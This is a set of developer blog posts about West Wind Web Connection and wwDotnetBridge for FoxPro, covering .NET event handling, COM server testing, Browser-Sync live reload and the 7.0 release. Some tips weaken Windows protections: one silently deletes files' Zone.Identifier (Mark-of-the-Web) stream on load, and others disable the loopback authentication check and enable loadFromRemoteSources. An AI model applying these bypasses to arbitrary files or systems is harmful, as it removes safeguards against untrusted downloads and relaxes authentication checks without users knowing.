
Web Connection 6.21 is here


We've released Web Connection 6.21, a relatively small update with a few bug fixes and operational tweaks.

There are also a few new features, one of which is not Web specific, but is a very useful generic FoxPro enhancement.

  • wwDotnetBridge now supports Event Handling for .NET Objects
  • New .NET Runtime Loader for wwDotnetBridge
  • Console command for Disable Loopback Check

As always, registered users of version 6.x can download free registered updates using the download information that was sent by email. To check out Web Connection you can always pick up the shareware version:

Event Handling for wwDotnetBridge

This is a cool feature that opens up additional features of .NET to FoxPro. You can now use wwDotnetBridge to handle .NET events in an asynchronous manner. Similar to the async method calls introduced a few releases back, you can now handle events in .NET and get called back, without having to register the .NET component and implement a COM interface.

This was previously not possible, or at the very least required that you create a COM object and interface that mapped the .NET type and was registered. With this new functionality you can use wwDotnetBridge alone, without any sort of special registration or even having to implement a FoxPro interface. You simply create a proxy object that handles the select events you choose to handle. Other events are simply ignored.

So what can you do with this? Here are a few example ideas:

  • Use SMTPClient natively and get notified on Progress events
  • Use WebClient and get notified of Web Events
  • Use the FileSystemWatcher on a folder and be notified of file updates

Basically most components that use events can now be used with wwDotnetBridge!

This feature was landed in the OSS version of wwDotnetBridge by a contributor, Edward Brey, who did most of the work for the event handling. Thanks Ed!

An Example

The following is an example using the .NET FileSystemWatcher object which allows you to monitor any file changes and updates in a given folder and optionally all of its subfolders.

The following monitors all changes in my c:\temp folder and all its subfolders, which includes my actual Windows Temp folder - meaning it's a busy folder. Lots of stuff gets written to temp files in Windows, so this generates a lot of traffic.

CLEAR
LOCAL loBridge as wwDotNetBridge
loBridge = GetwwDotnetBridge()

*** Create .NET File Watcher
loFW = loBridge.CreateInstance("System.IO.FileSystemWatcher","C:\temp")
loFw.EnableRaisingEvents = .T.
loFw.IncludeSubdirectories = .T.

*** Create Handler instance that maps events we want to capture
loFwHandler = CREATEOBJECT("FwEventHandler")
loSubscription = loBridge.SubscribeToEvents(loFw, loFwHandler)

DOEVENTS

lcFile = "c:\temp\test.txt"
DELETE FILE ( lcFile )  
STRTOFILE("DDD",lcFile)
STRTOFILE("FFF",lcFile)

* Your app can continue running here
WAIT WINDOW

loSubscription.Unsubscribe()

RETURN


*** Handler object implementation that maps the
*** event signatures for the events we want to handle
DEFINE CLASS FwEventHandler as Custom

FUNCTION OnCreated(sender,ev)
? "FILE CREATED: "
?  ev.FullPath
ENDFUNC

FUNCTION OnChanged(sender,ev)
? "FILE CHANGE: "
?  ev.FullPath
ENDFUNC

FUNCTION OnDeleted(sender, ev)
? "FILE DELETED: "
?  ev.FullPath
ENDFUNC

FUNCTION OnRenamed(sender, ev)
LOCAL lcOldPath, lcPath

? "FILE RENAMED: " 
loBridge = GetwwDotnetBridge()

lcOldPath = loBridge.GetProperty(ev,"OldFullPath")
lcPath = loBridge.GetProperty(ev,"FullPath")
? lcOldPath + " -> " + lcPath

ENDFUNC

ENDDEFINE

How does it work?

The event handling is based on a simple callback mechanism that uses a FoxPro event handler that is passed into .NET to be called back whenever an event occurs. The behavior is similar to the way BINDEVENT() works in FoxPro, with a slightly more explicit process.

SubscribeToEvents() allows you to capture events on a source object by passing in a callback handler that maps the events of the target object to corresponding methods on the handler.

To handle events:

  • Create an Event Handler Object
    Create a Custom class that implements methods that match the events of the .NET object that fires them, using an On<EventName> prefix. Each On<EventName> method's parameters should match the parameters of the .NET event delegate. You only need to implement the methods for the events you want to listen to - other events are ignored.

  • Create an Event Subscription
    Call loBridge.SubscribeToEvents() which binds a .NET event source object to a FoxPro event handler.

  • Continue running your Application
    Events are handled asynchronously in .NET and run in the background. Your application continues running and as events fire in .NET, the On<Event> methods are fired on the Event Handler object in FoxPro.

  • Unsubscribe from the Event Subscription
    When you no longer want to listen to events, call loSubscription.Unsubscribe(). Make sure you do this before you exit FoxPro or you may crash VFP on shutdown.

The key here is that you have to make sure that the .NET object you want to handle events on, as well as the event handler, stay alive, because they essentially run in the background waiting for events to fire. This means storing these references on long-lived objects like your main application's form, the FoxPro _screen, or global variables.
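
For example, in the FileSystemWatcher scenario above you might park the references on the _screen object. A minimal sketch - the property names are my own:

*** Keep watcher, handler and subscription alive for the app's lifetime
_screen.AddProperty("oFileWatcher", loFw)
_screen.AddProperty("oFwHandler", loFwHandler)
_screen.AddProperty("oFwSubscription", loSubscription)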

Events are not as prominent in .NET as they used to be back in the high flying days of UI frameworks. Few operational components fire events, but many of the core system IO services have events you can handle. Progress and completion events are common.

Now we have the tools to use these events in the same easy fashion as all other .NET access with wwDotnetBridge.

New wwDotnetBridge .NET Runtime Loader

In this release the .NET runtime loader used by wwDotnetBridge has been updated to the latest loader, which is specific to .NET 4.0 and later. In past years we weren't able to use the new loader because the older versions still loaded .NET 2.0, but with the recent switch to 4.5 we can now take advantage of it.

There are a couple of advantages here. The new loader is the officially recommended approach and provides a cleaner path to runtime loading, and more importantly it provides more error information. Previously the error information available from CLR loading was very cryptic, as the runtime did not report the underlying error, only a generic load failure. The new version reports the underlying error information, which is now passed on to wwDotnetBridge.

This feature was also landed by Edward Brey in the OSS version of wwDotnetBridge.

Console Command for disabling the Loopback Check Policy for Authentication on Servers

On servers, and apparently now also on newer versions of Windows 10, IIS enforces a local loopback check policy that prevents local Windows authentication from working. If the policy is applied, trying to access the Admin pages with authentication will fail. This can be a real pain when accessing the Web Connection Admin pages, which by default rely on Windows Authentication to allow access to the Admin functionality.

The problem manifests when you try to log in - you will not be able to use valid login credentials to actually authenticate. Instead you get 401 errors, which are auth errors.

Windows Servers have a policy that explicitly enables this Loopback Checking behavior, which effectively disables local Admin access. Recently I've also noticed that on Windows 10 1803 I couldn't access local addresses when using custom mapped local domains (ie. test.west-wind.com mapped to my localhost address).

There is a workaround for this issue via a registry hack. This release adds a Console function that lets you apply the registry setting without having to hack the registry manually:

console.exe DisableLoopbackChecking
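
If you'd rather apply the change yourself, the underlying setting is the well-known DisableLoopbackCheck registry value. Here's a minimal FoxPro sketch using the Windows Scripting Shell (run as Administrator; I'm not claiming this is exactly what the Console command does internally):

*** Set the DisableLoopbackCheck policy value directly
loShell = CREATEOBJECT("WScript.Shell")
loShell.RegWrite("HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableLoopbackCheck", ;
                 1, "REG_DWORD")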

I also wrote up a blog post with more information today:

Release Summary

Besides the marquee features, there are just a few small tweaks and bug fixes to the core libraries.

To see all that's changed in recent versions:

As always, let us know if you have questions or run into issues with new features or old on the message board:

Enjoy...

this post created and published with Markdown Monster

Testing a Web Connection COM Server with FoxPro or PowerShell


This is a quick tip to a question that comes up frequently when testing runtime installations:

How can I quickly test whether my COM server is properly installed and working on a live server where I don't have the full Visual FoxPro IDE installed?

If you recall, when you install Web Connection on a live server the preferred mode of operation is COM Mode, where Web Connection servers run as COM objects. If you ever run into a problem with a COM server not loading, the first thing you want to do is check whether the COM server can be loaded outside of Web Connection - either using a dedicated FoxPro IDE installation or, if you only have the FoxPro runtimes available, using PowerShell.

Registering your COM Server

The first step for COM servers on a new server is that they have to be registered in the Windows Registry. During development Visual FoxPro automatically registers the COM server as part of the build, but on a live server install you have to register the server manually.

Assuming you have an EXE server called MyApp, you can register your server using the following from a Command or PowerShell prompt running as an Administrator:

MyApp.exe /regserver

COM registration requires Admin access because the registration data is written into the HKEY_LOCAL_MACHINE key in the registry, which is writable only as an Admin user. On a server this usually isn't an issue as you typically are logged on as an Admin user, but on a local dev machine you typically need to start Command or PowerShell with Run As Administrator.

The /regserver Switch produces no Output

One problem with the /regserver switch is that it gives absolutely no feedback. You run it on your EXE and it looks like nothing happened regardless of whether it succeeded or failed. No output, no dialog - nothing.

COM Registration is Automatic with Web Connection Configuration Tooling

Note that if you're using the new Web Connection self-configuration tooling for applications - using YourServer_Config.prg or YourServer.exe CONFIG - the COM registration is automatically run for you, so you don't have to manually register the server.

The naming of the server by default will be MyApp.MyAppServer - the name is based on the project name plus the OLEPUBLIC server class name, which is auto-generated when the project is created. Keep in mind that if you change the name of the project or the class, the COM server name will also change, which can break existing installations.

When it's all said and done you should have a COM server registered as MyApp.MyAppServer.

Re-Register COM Servers when the Server Interface Changes

Note that COM server registration is always required on first installation, but also when you make changes to the public COM interface of the server. COM registration writes ClassIds, ProgIds and Type library information into the registry and if the COM interface changes these ids often change along with the interface signatures. So remember to re-register your servers whenever properties or methods on the Server class are added or changed.

Testing the Server

So, to test the server and see if it's actually working, you can do the following using FoxPro code:

loServer = CREATEOBJECT("MyApp.MyAppServer")
? loServer.ProcessHit("")   && produces an error HTML page if it works

This produces an error page with a 404 Not Found header because no path was passed. This is usually all you need to check whether the server can load and run. It's easy to run and remember.

If you want to see a real response from the server you can instead specify a physical path to the request. For example, to test the Web Connection sample server I can do:

loServer = CREATEOBJECT("wcDemo.wcDemoServer")
? loServer.ProcessHit("&PHYSICAL_PATH=c:\wconnect\web\wconnect\testpage.wwd")
loServer = null

which should produce the output of the testpage.

Note that it depends on the URL you hit whether additional parameters like query strings, form variables or other URL parts are required, but a simple GET request should typically work.
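
If the page you're testing does expect URL parameters, you can pass additional CGI-style variables in the same fashion. A hypothetical sketch - the exact variables your request needs depend on your application:

*** Hypothetical example: adding a query string to the simulated request
loServer = CREATEOBJECT("wcDemo.wcDemoServer")
? loServer.ProcessHit("&PHYSICAL_PATH=c:\wconnect\web\wconnect\testpage.wwd" + ;
                      "&QUERY_STRING=id=123")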

No FoxPro Installation? Use PowerShell

On a live server, however, you often don't have the FoxPro IDE installed, so you can't use FoxPro code to test a COM server. However, Windows PowerShell can instantiate COM objects (and also .NET objects), so we can use a PowerShell script to test the server.

$server =  new-object -comObject 'yourProject.yourProjectServer'
$server.ProcessHit("")

This should produce an HTML error page with an HTTP 404 response header that says page not found.

If you want to test a 'real' request, you can provide a physical path - here again using the Web Connection sample server as an example:

$server =  new-object -comObject 'wcDemo.wcDemoMain'
$server.ProcessHit("&PHYSICAL_PATH=c:\wconnect\web\wconnect\testpage.wwd")

# release the server (optional)
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($server) | Out-Null

Note the rather nasty syntax required to release a COM server from memory. Alternatively, you can shut down the PowerShell session to release the object.

Summary

Testing COM objects on an installed server is something that is often needed when you are troubleshooting an installation. A FoxPro installation is easiest, but if you only have a runtime install, the PowerShell option is a good, built-in alternative.

Fixing Windows Downloaded File Blocks and wwDotnetBridge


This is kind of a 'good to know' technical post that discusses some background information around wwDotnetBridge and one of the biggest issues with using it. In this post I'll talk about Windows download file blocking due to Zone Identifier marking, along with a solution for programmatically unblocking files easily. The fix will start showing up in version 6.22 of wwDotnetBridge going forward.

If you arrived here and don't know what wwDotnetBridge is, it's a bridge interface for accessing .NET from FoxPro without requiring COM instantiation. wwDotnetBridge hosts the .NET Runtime in FoxPro and provides a Proxy wrapper that can create instances of objects, call static methods, handle events, access generic members, deal with arrays and collections efficiently and provides a ton of helpers to access features of .NET that COM Interop can't.

Glowing features aside, in this post I'm talking about the #1 problem that surrounds wwDotnetBridge, which is the dreaded Windows File Blocking issue. This issue is caused by files downloaded from the Internet - either directly or in a Zip file - that Windows has marked as blocked.

A blocked file cannot be loaded into .NET over an AppDomain boundary, which in turn causes wwDotnetBridge to fail to load the .NET Runtime properly. It's a big fail, and while there are easy workarounds, to date I hadn't been able to automate the problem away. That is, until today - I'm happy to say that I've found a solution. Better late than never!

What's the Problem? Blocked files and wwDotnetBridge

For wwDotnetBridge blocked files are a big problem, because if you download wwDotnetBridge from Github or from West Wind Client Tools you are downloading a Zip file which when unzipped creates - you guessed it - blocked DLL files.

What File Blocking Does

This is a 'protection' feature of Windows which associates a Zone Identifier stream with a given file using something known as Alternate Data Streams (ADS). When you download a file to your Downloads folder, Windows adds the Zone Identifier alternate data stream as yourfile.dll:Zone.Identifier. If you download a Zip file, the contents of the Zip file - any executables - are marked as well. Once the zone identifier exists it moves along with the file if you copy it to another location on the local drive. This is all handled by the file system.
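
For reference, the stream itself is just a tiny INI-style blob of text. A file downloaded from the Internet zone typically carries something like this (ZoneId 3 identifies the Internet zone):

[ZoneTransfer]
ZoneId=3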

How that zone indicator is used is up to the host application. It turns out FoxPro doesn't care about it: I can reference a blocked DLL via DECLARE DLL and it works just fine. For example, even when marked as blocked, wwIPStuff.dll works in FoxPro without first unblocking it.

However, the .NET Runtime does care about Zone Identifiers as part of the bootstrapping process, so when wwDotnetBridge passes wwDotnetBridge.dll to the .NET Runtime/AppDomain as the runtime entry point assembly, the runtime checks the Zone Identifier and refuses to load the DLL.

What Blocking looks like with wwDotnetBridge

When wwDotnetBridge is run with a blocked wwDotnetBridge.dll file you will get an error. Running this most basic code:

DO wwDotnetBridge
loBridge = GetwwDotnetBridge()
loBridge.GetDotnetVersion()

will fail with an Unable to load CLR Instance error in the Load() method like this:

Note that this particular failure returns no error in lcError, because the runtime that normally returns the error is not actually loaded yet. Instead wwDotnetBridge provides an error message with the most likely scenarios and a link to the docs.

In order to get wwDotnetBridge to run, wwDotnetBridge.dll first has to be unblocked - which has been the cause of innumerable support requests.

Blocked only for Downloaded Files Or Downloaded Zip Archives

Note that this error occurs only when running a downloaded wwDotnetBridge.dll, either directly or from inside a ZIP file. So it happens with the GitHub and West Wind Client Tools zip files, but it does not happen with Web Connection and Html Help Builder, because both of those tools use an installer which never flags the files with the Zone Identifier responsible for the blocking.

Unblocking - Powershell

It turns out that unblocking is a common administration task in Windows and PowerShell has a dedicated cmdlet for it:

PS> unblock-file -Path '.\wwDotnetBridge.dll'

You can run that command and it will unblock the DLL, and the error goes away. It's not an administrative task either, so even a standard user can run it. Easy, but not exactly automatic.

I played around with this by running the load, checking for the specific error, and if I see it, unblocking via the PowerShell command from within FoxPro:

lcPath = FULLPATH("wwdotnetbridge.dll")
lcCmd = [powershell "Unblock-File -Path '] + lcPath + ['"]
RUN /N7 &lcCmd 

While this works to unblock the file, this process is slow (shelling out) and once unblocked I still have to quit FoxPro or my application to see the newly unblocked DLL - a retry to reload still fails in the same VFP session. So while it works I still see at least one initial failure.

Close but no cigar.

Unblocking - Deleting the Zone Stream

After a bit of research it turns out that there's a more direct way to unblock a file, which involves deleting the Zone Identifier stream in the Windows file system. This Alternate Data Stream can't be deleted using FoxPro's ERASE or DELETE FILE commands, so we have to use the Windows API DeleteFile() function instead. Easy enough:

*** Remove the Zone Identifier to 'Unblock'
DECLARE INTEGER DeleteFile IN WIN32API STRING		  			  			
DeleteFile(FULLPATH("wwDotNetBridge.dll") + ":Zone.Identifier")

*** To be extra sure - unblock other dependencies
DeleteFile(FULLPATH("newtonsoft.json.dll") + ":Zone.Identifier")
DeleteFile(FULLPATH("markdig.dll") + ":Zone.Identifier")

Et voila!

This code clears the Zone Identifier stream that is responsible for the block on the file.

Deleting the stream effectively unblocks the DLL, and if the identifier doesn't exist DeleteFile() quietly fails. And because it's a Windows API call it's also relatively fast - quick enough that I can run it every time wwDotnetBridge is instantiated, just to be sure the zone identifier isn't present.

So now that code is called as part of the load sequence in wwDotnetBridge which should do away with the blocked DLL issue for good. Yay!
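
If you want the same behavior in your own applications, it's easy to wrap this into a small reusable helper. A minimal sketch (the function name is my own):

*** Remove the Zone.Identifier stream from a file ('unblock')
*** Returns .T. if the stream was deleted, .F. if it didn't exist
FUNCTION UnblockFile(lcFileName)
DECLARE INTEGER DeleteFile IN WIN32API STRING
RETURN DeleteFile(FULLPATH(lcFileName) + ":Zone.Identifier") # 0
ENDFUNC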

What about other blocked DLLs

Please note that the only DLL affected is wwDotnetBridge.dll. wwIPStuff.dll, Newtonsoft.json.dll and markdig.dll work fine without unblocking. The reason is that wwDotnetBridge.dll is the initial .NET DLL loaded - the one containing the wwDotnetBridge type - when the .NET Runtime is bootstrapped in this code:

lnDispHandle = ClrCreateInstanceFrom(FULLPATH("wwDotNetBridge.dll"),;
                  "Westwind.WebConnection.wwDotNetBridge",@lcError,@lnSize)

Depending on your security setup you may still have to set LoadFromRemoteSources in your config file. I generally recommend you always add the following in a yourapp.exe.config and in your vfp9.exe.config (in the VFP install folder) to make .NET behave like other Win32/64 applications when it comes to network access:

<?xml version="1.0"?>
<configuration>
    <runtime>
        <loadFromRemoteSources enabled="true"/>
    </runtime>
</configuration>

The ClrCreateInstanceFrom() function in wwIPStuff.dll basically loads the .NET runtime, creates a new AppDomain, then loads the wwDotnetBridge .NET type from wwDotnetBridge.dll into it across AppDomain boundaries. This crossing of AppDomain boundaries before .NET policies are applied at the system level is what likely triggers the error in the first place.

A Big Load Off My Back!

This Windows file blocking has been a major thorn in my side and one of the sticking points around wwDotnetBridge adoption. When you're a new user just kicking the tires, the last thing you want to see is a nasty, unspecific error on first launch. Even though this problem is prominently documented, most people don't read the documentation carefully, so it's easy to miss.

Now, with this feature added to the latest wwDotnetBridge (not quite released yet), it should be much easier to get started with wwDotnetBridge regardless of where the installed version comes from.

Using Browser-Sync to live refresh Server Side HTML and Script Changes


Client side applications have been using live-reload behavior forever. When building Angular or Vue applications I don't give live reloading a second thought anymore: when I make a change to an HTML, TypeScript/JavaScript or CSS file, I expect the UI to reflect that change by automatically reloading the browser. This workflow makes it incredibly productive to iterate on code and build faster.

Unfortunately the same cannot be said for server side code. When working on script pages in Web Connection I make a change, then manually flip over to the browser to review it. While that's not the end of the world, it's much nicer to have a browser next to my editor and see every change reflected as I save.

Linking Browser and File Watchers

If you haven't used client side frameworks before and don't know how browser syncing works, here's a quick review. Browser syncing typically works via tooling that does two things:

  • File Change Monitoring
  • Updating the browser

File monitoring is easy enough. A file system watcher monitors the file system for changes to files you specify, typically via a set of wildcards. If any of these files change, the watcher kicks in to perform an action.

Depending on what you care about, this can be as simple as reloading the page, or - in the case of actual code files - a full rebuild of the application.

ASP.NET Core actually includes a built-in file watching tool called dotnet-watch which you can run to wrap the dotnet run command. But it only handles the recompilation part, not the browser refresh.

The other part of the equation is refreshing the browser. In order to do this, a tool needs to load the browser and inject a little bit of code into each page loaded in it, which communicates with a server that can reload the active page. This typically takes the form of a little WebSocket based client that runs in the Web page and talks to a calling host - typically a command line tool, or something running in developer tools the way Browser-Link does in Visual Studio.

As mentioned, Browser-Link in Visual Studio seems like it should handle this task, but for me this technology never worked for server side code. I've only gotten it to work with CSS files - which is actually very useful - but it would be a heck of a lot more useful if it worked with all server side files, even just uncompiled files like HTML, JavaScript and server side views that auto-recompile when they are reloaded. Alas, no luck.

Browser-Sync to the rescue

Luckily we don't have to rely on Microsoft to provide a solution to this. There are a few tools out there that allow browser syncing externally from the command line or via an admin console in a browser.

The one I like best is Browser-Sync. Most of these tools are NodeJs based, so you'll need Node and NPM to install them, but once installed you can run them from the command line as standalone programs. Browser-Sync does a lot more than just browser syncing.

In order to use Browser Sync you need a few things:

  • Install NodeJS/NPM
  • Install Browser Sync using NPM
  • Fire up Browser Sync from the Command Line
  • Let the games begin

As is common with many Web development related tools Browser Sync is built around NodeJS and is distributed via NPM, so make sure NodeJs is installed.

Next we need to install Browser-Sync. From a command prompt do:

npm install -g browser-sync

This installs a global copy of browser sync which can be run just like an executable that is available on the Windows path.

Now, in your console, navigate to the Web folder of your application. I'll use the Web Connection sample here:

cd \wconnect\web\wconnect

Next startup browser sync from this folder:

browser-sync start 
		--proxy localhost/wconnect 
		--files '**/*.wcs,**/*.wc, **/*.wwd, **/*.md, **/*.blog, css/*.css, scripts/*.js'

This command line starts monitoring for file changes in the current folder using the file spec provided in the --files parameter. Here I'm monitoring all of the scriptmapped extensions for my Web Connection scripts, as well as CSS and JavaScript files.

Note the --proxy localhost/wconnect switch, which tells browser-sync that I have an existing Web Server that's running requests. Browser-Sync has its own Web Server, and when running NodeJs applications you can use it as your server directly. However, since Web Connection doesn't work with Node, I use the --proxy switch to point at my application's virtual directory, which is http://localhost/wconnect/. If you're using IIS Express it'd be --proxy localhost:54311. The proxy feature changes your URL to the proxy server that browser-sync provides, typically localhost:3000.
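
For an IIS Express site, the full command might look like this - a sketch, assuming port 54311 from your project settings and file specs adjusted to your own scriptmaps:

browser-sync start --proxy localhost:54311 --files '**/*.wcs, css/*.css, scripts/*.js'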

Here's what this looks like when you run browser sync:

Browser sync automatically navigates to http://localhost:3000/wconnect and opens the browser for you.

Now go to the No Script sample at the wcscripts/noscripts.wcs page and open it. Next, jump into your editor of choice, make a change to the page - change the title to Customer List (updated) - and save.

The browser updates immediately without an explicit refresh:

Now go back and remove the change... again the browser refreshes immediately.

Et voila, live browser reload! Nice and easy - cool eh?

Making Browser Sync easier to load

For tools like this I like to make things easy, so I tend to create a small program that loads browser-sync with a single command. Here's a simple script I drop into my project folder to launch browser sync:

************************************************************************
*  BrowserSync
****************************************
***  Function: Live Reload on save operations
***    Assume: Install Browser Sync requires Node/NPM:
***            npm install -g browser-sync
***      Pass:
***    Return:
************************************************************************
FUNCTION BrowserSync(lcUrl, lcPath, lcFiles)

IF EMPTY(lcUrl)
   lcUrl = "localhost/wconnect"
ENDIF
IF EMPTY(lcPath)
   lcPath = LOWER(FULLPATH("..\web\wconnect"))
ENDIF
IF EMPTY(lcFiles)
   lcFiles = "**/*.wcs,**/*.wc, **/*.wwd, **/*.blog, css/*.css, scripts/*.js, **/*.htm*"
ENDIF

lcOldPath = CURDIR()
CD (lcPath)

lcBrowserSyncCommand = "browser-sync start " + ;
                       "--proxy " + lcUrl + " " + ;
                       "--files '" + lcFiles + "'"
RUN /n cmd /k &lcBrowserSyncCommand

? lcBrowserSyncCommand
_cliptext = lcBrowserSyncCommand

WAIT WINDOW "" TIMEOUT 1.5
CD (lcOldPath)

ENDFUNC
*   BrowserSync

And now I can simply launch browser sync with a simple command from the FoxPro command window:

DO browsersync

Installed with Web Connection 6.50

As of Web Connection 6.50, new projects auto-generate a browsersync.prg file into the code folder, so if you have browser-sync installed you can just DO browsersync to fire it up and open your site on the proxy port.

No Support for Web Connection Process Changes

Browser sync works great for any content that lives in the Web folder structure. Unfortunately, the process class lives in a separate folder hierarchy and can't be monitored there. Even if it could be, the Web Connection server has to be restarted to see changes to the process class, because those classes are not unloaded.

So for 'real' code changes you're still going to have some manual cycling time. But that's probably OK. The time consuming stuff usually revolves around the fiddly HTML and CSS manipulation and that's where browser-sync can really help make you more productive.

Caveats

I've been using Browser-Sync for a while now, and while it works pretty well it does get 'stuck' every once in a while. It usually starts with the browser taking a long time to refresh a page or navigate to a new one. It doesn't happen very often, but it happens enough to mention here. Incidentally, I see the same thing happening with the WebPack dev server in Angular. These tools are pretty hacky in how they intercept traffic and refresh, so I'm not surprised that the Web Socket connection gets flaky in some situations. If anything, I'm rather surprised how well it works.

Once I see the browser navigating slowly or refreshing really slowly I simply kill the console window that's running the browser-sync code and I re-run DO browsersync from the FoxPro command line to start a new instance.

A couple of things that will help:

  • Try not to have multiple browser instances open to the proxy url (localhost:3000 typically)
  • Don't start multiple instances of browser sync (obviously)
  • Minimize explicit full browser refreshes (ctrl-shift-r)

Again, it's not a deal breaker, especially since it's drop dead easy to stop and restart.

Summary

Browser syncing may not sound like that impressive of a feature, but I have to say that it ends up changing the way you work. I know it did for me. Because changes are immediately reflected, you can much more easily experiment with small changes and see them immediately while you're editing. This is especially useful for CSS changes, which are often very fiddly, but also for script and HTML layout changes.

Either way it's a great productivity enhancing tool.

Sync on...

this post created and published with Markdown Monster

West Wind Web Connection 7.0 has been released


The final build of Web Connection 7.0 was released today and is available for download now. You can grab the latest shareware version from the Web Connection Web site:

Upgrades and full versions are available in the store:

Also released today is the User Security Manager for Web Connection, an add-on that handles user account authentication and profile management:

Big Release

Web Connection 7.0 is a major update that includes many enhancements and optimizations.

Here's a list of all that has changed and been added:

What follows is a lot more detail on some of the enhancements if you are interested.

Focus on Streamlining and Consolidation

This release continues along the path of streamlining relevant features and making Web Connection easier to operate during development and for deployment. As most of you know Web Connection is a very mature product that has been around for nearly 25 years now (yes the first Web Connection release shipped in late 1994!) and there is a lot of baggage from that time that is no longer relevant. A lot of stuff has of course been trimmed over the years and this version is no different.

This release consolidates a lot of features and removes many libraries that hardly anyone uses - certainly not in new projects - by default. The libraries are still there (in the \classes\OldFiles folder), but they are no longer loaded by default.

The end result is a leaner installation package of Web Connection (down to 20 megs vs. 35 megs) and considerably smaller base applications (down to ~700k vs 1.1meg).

Removing VCX Classes in favor of PRG Classes

One thorn in my personal side has been that Web Connection included a few VCX classes that don't really need to be visual. wwSql, wwXml, wwBusiness and wwWebServer all were visual classes that have now been refactored into PRG classes.

This is a breaking change that requires changing SET CLASSLIB TO to SET PROCEDURE TO for these classes using a Search and Replace operation.

wwBusiness is a special case, as it can be - and often was - used with visual classes for subclassing. So wwBusiness.vcx still exists in the OldFiles folder, but there are new wwBusinessObject and wwBusinessCollectionList classes that replace it. If you already used PRG based business object subclasses, it's a simple matter of replacing SET CLASSLIB TO wwBusiness with SET PROCEDURE TO wwBusinessObject and replacing AS wwBusiness with AS wwBusinessObject.

For visual classes you can either continue to use the VCX based wwBusiness class, or - better perhaps - extract the code of each class to a PRG file using the Class Browser and derive the classes off wwBusinessObject. For business objects that were dropped on a form or container, that code would also need to be replaced with THISFORM.AddProperty(oBusObject,CREATEOBJECT("cCustomer")) and so on. A minimal before and after sketch follows below.
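
Assuming a hypothetical cCustomer business object subclass, the PRG migration looks like this:

*** Before: VCX based business object
SET CLASSLIB TO wwBusiness ADDITIVE
loCustomer = CREATEOBJECT("cCustomer")  && subclass OF wwBusiness

*** After: PRG based business object
SET PROCEDURE TO wwBusinessObject ADDITIVE
loCustomer = CREATEOBJECT("cCustomer")  && subclass OF wwBusinessObject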

VCX Class to PRG Class Migrations

Bootstrap 4 and FontAwesome 5

Other highlights in this update include getting the various support frameworks up to date.

Web Connection 7.0 ships with Bootstrap 4 and FontAwesome 5 (free) support, which updates the original versions shipped with Web Connection 6 more than 4 years ago. This is one thing that's troublesome about Web applications: client side frameworks change frequently, and as a result anything that depends on them - including a tool like Web Connection - also has to update. The process is not difficult, but it is time consuming, as there are a handful of places in the framework (mainly the wwHtmlHelpers) with dependencies on UI framework specific features.

That said, having upgraded 3 different applications to Bootstrap 4 and FontAwesome 5 I can say that the process is relatively quick if you decide to upgrade. 95% of the work is search and replace related, while the remaining 5% is finding specific UI constructs and updating them (mainly related to change in Bootstrap 4's use of Card vs. panels, wells, tooltips etc.).

While it's nice to upgrade to the latest version of the UI frameworks and keep up to date with new styles and features, it's also important to understand that you don't have to upgrade. If you have an app that runs with Bootstrap 3/FontAwesome 4 you can continue to use those older UI frameworks - using Web Connection 7.0 isn't going to break your application.

Migration from Bootstrap 3 to 4 in the documentation.

Project Management Improvements

One of the most important focal points of this update and many changes since v6.0 have been around making Web Connection Projects easier to create, run, maintain and deploy. Web Connection 7.0 continues to make things easier and quicker and hopefully more obvious for someone just getting started.

Fast Project Creation - Ready to Run

To give you some perspective: I use the project system constantly when I need to test something out locally. When I see a message on the message board with a question about some feature, it's often easier for me to quickly create a new project and push in a few changes than to even pull down a demo project and add features. Creating a new project literally takes a minute, and I have a running application.

There's a new Launch.prg file that is generated that automates launching a project consistently, regardless of which project you're in.

The process now literally is:

  • Use the Console
  • Run the New Project Wizard
  • DO Launch.prg

The browser is already spun up for you and additional instructions on how to launch either IIS or IIS Express are displayed on the screen.

Launch.prg is a new file generated by the new project wizard which basically does the following:

  • Calls SetPaths.prg to set the environment
  • Opens the browser to the IIS or IIS Express Url
  • If running IIS Express launches IIS Express
  • Launches your Web Connection Server instance
    using DO <yourApp>Main.prg

You can do this to launch with IIS:

DO Launch

which opens the application at http://localhost/WebDemo (or whatever your virtual is called).

To launch for IIS Express:

DO Launch WITH .T.

which passes a flag that launches IIS Express and changes the URL to http://localhost:7000. This is a configurable script, so you can add other things you might need at launch time.

Here's what this script looks like for the WebDemo project.

********************************************
FUNCTION Launch
***************
LPARAMETER llIISExpress

CLEAR

*** Set Environment
*** Sets Paths to Web Connection Framework Folders
DO SETPATHS

lcUrl = "http://localhost/WebDemo"

IF llIISExpress
   *** Launch IIS Express on Port 7000
   DO CONSOLE WITH "IISEXPRESS",LOWER(FULLPATH("..\Web")),7000
   lcUrl = "http://localhost:7000"
ENDIF

*** Launch in Browser
DO CONSOLE WITH "GOURL",lcUrl
? "Running:" 
? "DO Launch.prg " + IIF(llIISExpress,"WITH .T.","")
?
? "Web Server used:"
? IIF(llIISExpress,"IIS Express","IIS")
?
IF llIISExpress
   ? "Launched IISExpress with:"
   ? [DO console WITH "IISExpress","..\Web",7000]
   ?
ENDIF

? "Launching Web Url:" 
? lcUrl
? 
? "Server executed:"
? "DO WebdemoMain.prg"

*** Start Web Connection Server
DO WebdemoMain.prg

This makes it really easy to launch consistently, for any project, whether you are running with full IIS or IIS Express.

Even if you're running an old project I encourage you to add a Launch.prg for an easier launch experience. I've been doing this for years, but manually - now the process is automated.

Launch.prg also prints to the desktop what it's doing. It tries to be transparent, so you don't just see a black box - you can see the actual commands and steps that get your app up and running, which also lets you launch manually even if you don't use Launch.prg. The goal is to help new users understand what's actually going on, while at the same time making things much easier and more consistent to run.

BrowserSync.prg - Live Reload for Server Code

BrowserSync is a NodeJs based tool that can automatically reload the active page in the Web browser when you make a change to a file in your Website. The idea is that you can much more quickly edit files in your site - especially Web Connection Scripts or Templates - and immediately see the change reflected in the browser without having to explicitly navigate or refresh the browser.

Using BrowserSync you can have your code and a live browser window side by side and as you make changes and save, you can immediately see the result of your change reflected in the browser. It's a very efficient way to work.

When you create a new project, Web Connection now creates a BrowserSync.prg that's properly configured for your project. Assuming browser-sync is installed, this file will:

  • Launch Browser Sync on the Command Line
  • Navigate your browser to the appropriate site and port
  • Start your FoxPro server as a PRG file (DO yourAppMain.prg)

There's more information on what you need to install BrowserSync in the documentation:

Using BrowserSync during Development to Live Reload Changes

New Projects Automatically Create a Git Repository

If Git is installed on the local machine, the New Project Wizard now automatically sets up a Git repository and makes an initial commit. New projects include FoxPro and Web Connection specific .gitignore and .gitattributes files.

